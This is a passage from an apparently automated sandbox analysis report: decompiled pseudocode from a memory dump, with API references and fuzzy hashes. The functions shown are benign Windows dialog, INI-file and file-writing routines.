                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				intOrPtr* _t30;
                                                                                                                                                                    				intOrPtr* _t34;
                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                    
                                                                                                                                                                    				_t30 = __ecx;
                                                                                                                                                                    				E0040E340(0x4004, __ecx);
                                                                                                                                                                    				_push(0x4000);
                                                                                                                                                                    				_push(0);
                                                                                                                                                                    				_v16392 = 0;
                                                                                                                                                                    				_t34 = _t30;
                                                                                                                                                                    				_push( &_v16390);
                                                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                                                    					memset();
                                                                                                                                                                    					GetPrivateProfileStringW(_a8, _a12, 0x40f454,  &_v16392, 0x2000, _a20);
                                                                                                                                                                    					asm("sbb esi, esi");
                                                                                                                                                                    					_t37 =  ~_t36;
                                                                                                                                                                    					E00405F0A( &_v16392, _t34, _a16);
                                                                                                                                                                    				} else {
                                                                                                                                                                    					memset();
                                                                                                                                                                    					E00405E81(_a16,  *_t34,  &_v16392);
                                                                                                                                                                    					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t37;
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 0040D614
                                                                                                                                                                      • Part of subcall function 00405E81: _snwprintf.MSVCRT ref: 00405EC6
                                                                                                                                                                      • Part of subcall function 00405E81: memcpy.MSVCRT ref: 00405ED6
                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D63D
                                                                                                                                                                    • memset.MSVCRT ref: 0040D647
                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32 ref: 0040D669
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1127616056-0
                                                                                                                                                                    • Opcode ID: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
                                                                                                                                                                    • Instruction ID: e5ada5cee961c9ffd84a11649d97ac6ffa4cf685c3efd691eec2e39df5646265
                                                                                                                                                                    • Opcode Fuzzy Hash: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
                                                                                                                                                                    • Instruction Fuzzy Hash: D5118272500119AFDF11AF65DC02E9E7B79EF04704F100476FF09B20A1E6359A649F9D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00402B94(struct HWND__* _a4, int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                    				void _v48;
                                                                                                                                                                    				void* _v52;
                                                                                                                                                                    				int _v68;
                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                    				int _v92;
                                                                                                                                                                    				void _v96;
                                                                                                                                                                    				void* _v100;
                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                    
                                                                                                                                                                    				memset( &_v96, 0, 0x2c);
                                                                                                                                                                    				_v100 = _a12;
                                                                                                                                                                    				_v80 = _a16;
                                                                                                                                                                    				_v72 = _a20;
                                                                                                                                                                    				_v96 = 0;
                                                                                                                                                                    				_v92 = 0;
                                                                                                                                                                    				_v68 = 0;
                                                                                                                                                                    				memset( &_v48, 0, 0x2c);
                                                                                                                                                                    				_v52 = 4;
                                                                                                                                                                    				if(SendMessageW(_a4, 0x120b, _a8,  &_v52) != 0) {
                                                                                                                                                                    					_t34 = _v32 & 0x00000003;
                                                                                                                                                                    					if(_t34 != 0) {
                                                                                                                                                                    						_v80 = _v80 & 0xfffffffc | _t34;
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				return SendMessageW(_a4, 0x120c, _a8,  &_v100);
                                                                                                                                                                    			}














                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 568519121-0
                                                                                                                                                                    • Opcode ID: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
                                                                                                                                                                    • Instruction ID: b9af20001e59f3bd0701389c088e4a3ca17ea943e2d6bc3205c17ab3910d7cc1
                                                                                                                                                                    • Opcode Fuzzy Hash: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
                                                                                                                                                                    • Instruction Fuzzy Hash: 61115B72508314ABD711DF14CC0199FBFE8EB89750F004A2AFA64E7290D371DA20CB96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 47%
                                                                                                                                                                    			E0040A3BF(void* __esi) {
                                                                                                                                                                    				void* _v516;
                                                                                                                                                                    				long _v1028;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				wchar_t* _t15;
                                                                                                                                                                    				signed short _t23;
                                                                                                                                                                    				signed short _t25;
                                                                                                                                                                    				void* _t29;
                                                                                                                                                                    
                                                                                                                                                                    				_t29 = __esi;
                                                                                                                                                                    				_push(E0040778A( *((intOrPtr*)(__esi + 0x69c))));
                                                                                                                                                                    				_t23 = 4;
                                                                                                                                                                    				_push(E00406827(_t23));
                                                                                                                                                                    				_push(0xff);
                                                                                                                                                                    				_push( &_v516);
                                                                                                                                                                    				L0040DFD6();
                                                                                                                                                                    				_t15 = E00407E16( *((intOrPtr*)(__esi + 0x69c)), 0);
                                                                                                                                                                    				if(_t15 > 0) {
                                                                                                                                                                    					_push(_t15);
                                                                                                                                                                    					_t25 = 5;
                                                                                                                                                                    					_push(E00406827(_t25));
                                                                                                                                                                    					_push(0xff);
                                                                                                                                                                    					_push( &_v1028);
                                                                                                                                                                    					L0040DFD6();
                                                                                                                                                                    					_t15 = wcscat( &_v516,  &_v1028);
                                                                                                                                                                    				}
                                                                                                                                                                    				if( *((intOrPtr*)(_t29 + 0x208)) != 0) {
                                                                                                                                                                    					return SendMessageW( *(_t29 + 0x214), 0x40b, 0,  &_v516);
                                                                                                                                                                    				}
                                                                                                                                                                    				return _t15;
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                                      • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                                      • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A3EC
                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040A451
                                                                                                                                                                      • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                                      • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                                      • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A417
                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A42A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 822687973-0
                                                                                                                                                                    • Opcode ID: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
                                                                                                                                                                    • Instruction ID: d08295fd2af1cf787610e7cf5331bd4bc3d6faa59d3d329b1d8aec9a5db4e45c
                                                                                                                                                                    • Opcode Fuzzy Hash: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
                                                                                                                                                                    • Instruction Fuzzy Hash: 5C01D8B29003096AE720F275CC8AFA773ACAB40318F00447EB71AF10C2D679A9154A6D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040576B(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                                                                    				long _v8;
                                                                                                                                                                    				long _v12;
                                                                                                                                                                    				long _t13;
                                                                                                                                                                    				void* _t14;
                                                                                                                                                                    				struct HWND__* _t24;
                                                                                                                                                                    
                                                                                                                                                                    				_t24 = GetDlgItem(_a4, _a8);
                                                                                                                                                                    				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                                                                                                    				_v12 = _t13;
                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                    				if(_t13 <= 0) {
                                                                                                                                                                    					L3:
                                                                                                                                                                    					_t14 = 0;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                                    						if(_v8 < _v12) {
                                                                                                                                                                    							continue;
                                                                                                                                                                    						} else {
                                                                                                                                                                    							goto L3;
                                                                                                                                                                    						}
                                                                                                                                                                    						goto L4;
                                                                                                                                                                    					}
                                                                                                                                                                    					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                                                                                                    					_t14 = 1;
                                                                                                                                                                    				}
                                                                                                                                                                    				L4:
                                                                                                                                                                    				return _t14;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                    • GetDlgItem.USER32 ref: 00405779
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00405791
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 004057A7
                                                                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 004057CA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSend$Item
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3888421826-0
                                                                                                                                                                    • Opcode ID: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
                                                                                                                                                                    • Instruction ID: ea6b6bb6de5f5fc2c04e1b050f2a77b7acc78c850c927156145779c4c3b5f003
                                                                                                                                                                    • Opcode Fuzzy Hash: 84320e977df6a92d9295fdec2ba4224318a32ded31fcf9cf43a568e2f97b542c
                                                                                                                                                                    • Instruction Fuzzy Hash: FEF01975A0010CFFEB119F95CDC5DAFBBB9EB49794F20447AFA04E6150D2709E01AA64
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                    			E00402F8E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                    				intOrPtr* _t36;
                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                    				void* _t48;
                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                    
                                                                                                                                                                    				_t40 = __edx;
                                                                                                                                                                    				_push(__ebx);
                                                                                                                                                                    				_t47 = __ecx;
                                                                                                                                                                    				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
                                                                                                                                                                    				E0040DB6F(GetDlgItem( *(_t47 + 0x10), 0x3f1));
                                                                                                                                                                    				SetFocus(GetDlgItem( *(_t47 + 0x10), 0x3ee));
                                                                                                                                                                    				_t16 = GetDlgItem( *(_t47 + 0x10), 0x3ee);
                                                                                                                                                                    				E00405700(_t16, E00406827(0x3b7), 1);
                                                                                                                                                                    				E00405700(_t16, E00406827(0x3b8), 2);
                                                                                                                                                                    				E0040300B(_t47);
                                                                                                                                                                    				_t36 = _t47;
                                                                                                                                                                    				_pop(_t48);
                                                                                                                                                                    				_t49 = _t36;
                                                                                                                                                                    				 *((intOrPtr*)( *_t49 + 4))(1, _t48);
                                                                                                                                                                    				 *((intOrPtr*)( *_t49 + 0x1c))();
                                                                                                                                                                    				E00405B17(_t40,  *((intOrPtr*)(_t49 + 0x10)), 4);
                                                                                                                                                                    				return 0;
                                                                                                                                                                    			}









                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
                                                                                                                                                                      • Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                                      • Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                                      • Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                                    • GetDlgItem.USER32 ref: 00402FAC
                                                                                                                                                                      • Part of subcall function 0040DB6F: LoadLibraryW.KERNEL32(shlwapi.dll,74EB48C0,?,00402FB4,00000000), ref: 0040DB78
                                                                                                                                                                      • Part of subcall function 0040DB6F: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
                                                                                                                                                                      • Part of subcall function 0040DB6F: FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E
                                                                                                                                                                    • GetDlgItem.USER32 ref: 00402FBF
                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 00402FC2
                                                                                                                                                                    • GetDlgItem.USER32 ref: 00402FCC
                                                                                                                                                                      • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                                      • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                                      • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                                      • Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
                                                                                                                                                                      • Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729
                                                                                                                                                                      • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                                      • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                                      • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ItemWindow$HandleLibraryLoadMessageModuleSend$AddressClientFocusFreeProcRectStringmemcpywcscpywcslen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2946568780-0
                                                                                                                                                                    • Opcode ID: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
                                                                                                                                                                    • Instruction ID: 30f591fb8b2f5730a97996d02f89d272a17373ddbf4734e32a48e8550da6c286
                                                                                                                                                                    • Opcode Fuzzy Hash: 52cbf3b4b279be617207ad7872dd7437349133491b3365fd1e852972f4b5ad5a
                                                                                                                                                                    • Instruction Fuzzy Hash: 46F0C8B2A00700E7D22177B6AC46E2B76ACEF84719F06093EF541F71D2CA799D055658
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                    			E0040877D(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                                                                    				long _v8;
                                                                                                                                                                    				void _v32775;
                                                                                                                                                                    				char _v32776;
                                                                                                                                                                    
                                                                                                                                                                    				E0040E340(0x8004, __ecx);
                                                                                                                                                                    				_v32776 = 0;
                                                                                                                                                                    				memset( &_v32775, 0, 0x7fff);
                                                                                                                                                                    				WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v32776, 0x7fff, 0, 0);
                                                                                                                                                                    				return WriteFile(_a4,  &_v32776, strlen( &_v32776),  &_v8, 0);
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 004087A2
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000003,000000FF,?,00007FFF,00000000,00000000), ref: 004087BF
                                                                                                                                                                    • strlen.MSVCRT ref: 004087D1
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 004087E2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                    • Opcode ID: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
                                                                                                                                                                    • Instruction ID: be2e12bba75bd4d95a24d89f44609daf6c821d09d66759c01e9b41f40a714cd1
                                                                                                                                                                    • Opcode Fuzzy Hash: 51ae4e62cfb9bf55f12b25eeafec9d01389194143adb00a77a57f99ffa8f8497
                                                                                                                                                                    • Instruction Fuzzy Hash: 66F062B640112CBEEB91AB95DD81DEB776CEB04258F0045B2B705E6180D974AE484F7C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                    			E004087EC(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                                                                    				long _v8;
                                                                                                                                                                    				void _v8199;
                                                                                                                                                                    				char _v8200;
                                                                                                                                                                    
                                                                                                                                                                    				E0040E340(0x2004, __ecx);
                                                                                                                                                                    				_v8200 = 0;
                                                                                                                                                                    				memset( &_v8199, 0, 0x1fff);
                                                                                                                                                                    				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                                                                    				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                                                                    			}







                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 00408811
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000003,000000FF,?,00001FFF,00000000,00000000), ref: 0040882A
                                                                                                                                                                    • strlen.MSVCRT ref: 0040883C
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 0040884D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                    • Opcode ID: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
                                                                                                                                                                    • Instruction ID: 1e840beb1bf30e5fccbc8f780a259ac9f9e503c3acfa46e2f16182fe3cbfa9d3
                                                                                                                                                                    • Opcode Fuzzy Hash: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
                                                                                                                                                                    • Instruction Fuzzy Hash: 5AF06DB340022CBEEB159B95DDC8DEB776CDB08254F0005B6B705E2082D674AE488B78
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 19%
                                                                                                                                                                    			E0040D4A5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				void* _t11;
                                                                                                                                                                    				void* _t26;
                                                                                                                                                                    				void* _t27;
                                                                                                                                                                    
                                                                                                                                                                    				_t26 = __edx;
                                                                                                                                                                    				_t11 = _a4 - 0x110;
                                                                                                                                                                    				_t27 = __ecx;
                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                    					E0040D12C(__ecx, __ecx, __eflags);
                                                                                                                                                                    					E00405B17(_t26,  *((intOrPtr*)(__ecx + 0x10)), 4);
                                                                                                                                                                    					L5:
                                                                                                                                                                    					return E004015CE(_t27, _a4, _a8, _a12);
                                                                                                                                                                    				}
                                                                                                                                                                    				if(_t11 != 0x28 || E00405954(_a12) == 0) {
                                                                                                                                                                    					goto L5;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					SetBkMode(_a8, 1);
                                                                                                                                                                    					SetBkColor(_a8, 0xffffff);
                                                                                                                                                                    					SetTextColor(_a8, 0xc00000);
                                                                                                                                                                    					return GetStockObject(0);
                                                                                                                                                                    				}
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00405954: memset.MSVCRT ref: 00405973
                                                                                                                                                                      • Part of subcall function 00405954: GetClassNameW.USER32 ref: 0040598A
                                                                                                                                                                      • Part of subcall function 00405954: _wcsicmp.MSVCRT ref: 0040599C
                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040D4CC
                                                                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 0040D4DA
                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 0040D4E8
                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 0040D4F0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 764393265-0
                                                                                                                                                                    • Opcode ID: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
                                                                                                                                                                    • Instruction ID: 94e493e720f5362771ebb13374b41de4394e2b92cb987e20627275f4cfdde941
                                                                                                                                                                    • Opcode Fuzzy Hash: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
                                                                                                                                                                    • Instruction Fuzzy Hash: 8BF08132100204BBDF212FA4DD06A9A3F65EF04724F108136FA14B95F2CB75A9689E48
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00401482() {
                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                    				struct HWND__* _t17;
                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                    				void* _t26;
                                                                                                                                                                    
                                                                                                                                                                    				if( *0x412394 == 2) {
                                                                                                                                                                    					ExitProcess(1);
                                                                                                                                                                    				}
                                                                                                                                                                    				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
                                                                                                                                                                    				_t25 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                                                    				if( *(_t26 + 0xc) == 0x110) {
                                                                                                                                                                    					_t17 =  *(_t25 + 0x10);
                                                                                                                                                                    					 *(_t26 + 0xc) = _t17;
                                                                                                                                                                    					if( *0x412ecc != 0) {
                                                                                                                                                                    						EnumChildWindows(_t17, E00406B34, 2);
                                                                                                                                                                    						EnumChildWindows( *(_t26 + 0xc), E00406B34, 1);
                                                                                                                                                                    						E00405D0F( *(_t26 + 0xc), 0x400000);
                                                                                                                                                                    					}
                                                                                                                                                                    				}
                                                                                                                                                                    				if( *((intOrPtr*)(_t25 + 8)) != 0) {
                                                                                                                                                                    					SetWindowLongW( *(_t25 + 0x10), 0,  *(_t25 + 0xc));
                                                                                                                                                                    				}
                                                                                                                                                                    				_t14 =  *((intOrPtr*)(_t26 - 0x1c));
                                                                                                                                                                    				return E0040E2F1(_t14);
                                                                                                                                                                    			}








                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ChildEnumWindows$ExitLongProcessWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2626381504-0
                                                                                                                                                                    • Opcode ID: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
                                                                                                                                                                    • Instruction ID: e2987c10faa884b4915a7f97f1375000f64f28bf07688916d28e14d934a6fd2a
                                                                                                                                                                    • Opcode Fuzzy Hash: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
                                                                                                                                                                    • Instruction Fuzzy Hash: 15011A30500209EFDB249F55ED0AB9A37A1EB00324F20C579F9657A5F0C7B96854DF18
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E0040C3B4(void** __eax, struct HWND__* _a4) {
                                                                                                                                                                    				int _t7;
                                                                                                                                                                    				void** _t11;
                                                                                                                                                                    
                                                                                                                                                                    				_t11 = __eax;
                                                                                                                                                                    				if( *0x413258 == 0) {
                                                                                                                                                                    					memcpy(0x412668,  *__eax, 0x50);
                                                                                                                                                                    					memcpy(0x412398,  *(_t11 + 4), 0x2cc);
                                                                                                                                                                    					 *0x413258 = 1;
                                                                                                                                                                    					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E0040C0C7, 0);
                                                                                                                                                                    					 *0x413258 =  *0x413258 & 0x00000000;
